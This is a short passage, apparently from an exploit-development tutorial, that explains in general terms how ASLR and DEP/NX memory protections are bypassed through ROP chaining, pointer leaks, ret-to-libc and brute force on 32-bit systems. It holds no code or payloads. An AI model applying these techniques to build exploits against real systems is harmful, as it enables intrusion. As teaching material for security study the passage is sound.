We need to first evade ASLR. There are basically two ways in which ASLR can be bypassed:

1. Look for any anti-ASLR modules being loaded into memory. We will have the base address of any module at a fixed location. From here, we can use the Return Oriented Programming (ROP) approach. We will basically use small parts of code, followed by a return instruction, and chain everything to get the desired result:

2. We get pointer leak/memory leak, and we adjust the offset to grab the base address of the module whose pointer gets leaked.
3. To bypass the NX/DEP, we use a well-known ret-to-libc attack (in Linux) or ROP chaining (in Windows). This method allows us to use libc functions to perform the task we would have done with our shellcode.
4. There's another method that's used to bypass ASLR in 32-bit systems since 32 bits is a comparatively small address space compared to 64-bit systems. This makes the range of randomization smaller and feasible compared to brute force.

This is pretty much the basic concept behind bypassing ASLR and DEP. There are many more advanced ways of writing exploits, and as the patches are applied, new methods are discovered to bypass them.